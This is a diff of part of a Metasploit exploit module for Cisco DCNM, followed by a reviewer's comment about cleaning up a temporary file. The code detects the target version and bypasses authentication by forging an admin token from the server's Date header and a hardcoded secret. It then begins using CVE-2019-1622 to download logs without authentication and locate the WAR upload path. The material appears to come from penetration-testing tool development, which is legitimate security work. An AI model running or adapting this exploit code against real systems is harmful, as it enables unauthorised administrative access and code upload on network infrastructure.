cisco_dcnm_upload_2019.rb

```diff
@@ -0,0 +1,294 @@
+          print_good("#{peer} - Detected DCNM 10.4(2)")
+          print_status("#{peer} - No authentication required, ready to exploit!")
+          return targets[3]
+        else
+          print_error("#{peer} - Failed to detect target version.")
+          print_error("Please contact module author or add the target yourself and submit a PR to the Metasploit project!")
+          print_error(res.body)
+          print_status("#{peer} - We will proceed assuming the version is below 10.4(2) and vulnerable to auth bypass")
+          return targets[3]
+        end
+      end
+      fail_with(Failure::NoTarget, "#{peer} - Failed to determine target")
+    end
+  end
+
+
+  def auth_v11
+    res = send_request_cgi({
+      'uri'    => normalize_uri(datastore['TARGETURI'], 'fm/'),
+      'method' => 'GET',
+      'vars_get'  =>
+      {
+        'userName'  => datastore['USERNAME'],
+        'password'  => datastore['PASSWORD']
+      },
+    })
+
+    if res && res.code == 200
+      # get the JSESSIONID cookie
+      if res.get_cookies
+        res.get_cookies.split(';').each { |cok|
+          if cok =~ /JSESSIONID/
+            return cok
+          end
+        }
+      end
+    end
+  end
+
+
+  def auth_v10
+    # step 1: get a JSESSIONID cookie and the server Date header
+    res = send_request_cgi({
+      'uri'    => normalize_uri(datastore['TARGETURI'], 'fm/'),
+      'method' => 'GET'
+    })
+
+    # step 2: convert the Date header and create the auth hash
+    if res and res.headers['Date']
+      jsession = res.get_cookies.split(';')[0]
+      date = Time.httpdate(res.headers['Date'])
+      server_date = date.strftime("%s").to_i * 1000
+      print_good("#{peer} - Got sysTime value #{server_date.to_s}")
+
+      # auth hash format:
+      # username + sessionId + sysTime + POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF
+      session_id = rand(1000..50000).to_s
+      md5 = Digest::MD5.digest 'admin' + session_id + server_date.to_s +
+        "POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF"
+      md5_str = Base64.strict_encode64(md5)
+
+      # step 3: authenticate our cookie as admin
+      # token format: sessionId.sysTime.md5_str.username
+      res = send_request_cgi({
+        'uri'    => normalize_uri(datastore['TARGETURI'], 'fm', 'pmreport'),
+        'cookie' => jsession,
+        'vars_get'  =>
+        {
+          'token'  => "#{session_id}.#{server_date.to_s}.#{md5_str}.admin"
+        },
+        'method' => 'GET'
+      })
+
+      if res and res.code == 500
+        return jsession
+      end
+    end
+  end
+
+
+  # use CVE-2019-1622 to fetch the logs unauthenticated, and get the WAR upload path from jboss*.log
+  def get_war_path
+    res = send_request_cgi({
+      'uri'    => normalize_uri(datastore['TARGETURI'], 'fm', 'log', 'fmlogs.zip'),
+      'method' => 'GET'
+    })
+
+    if res and res.code == 200
+      tmp = Tempfile.new
```

Comment:
We will want to make sure this file gets cleaned up after we are through with it. If it is helpful to keep around you could add an advanced option to move the file to loot.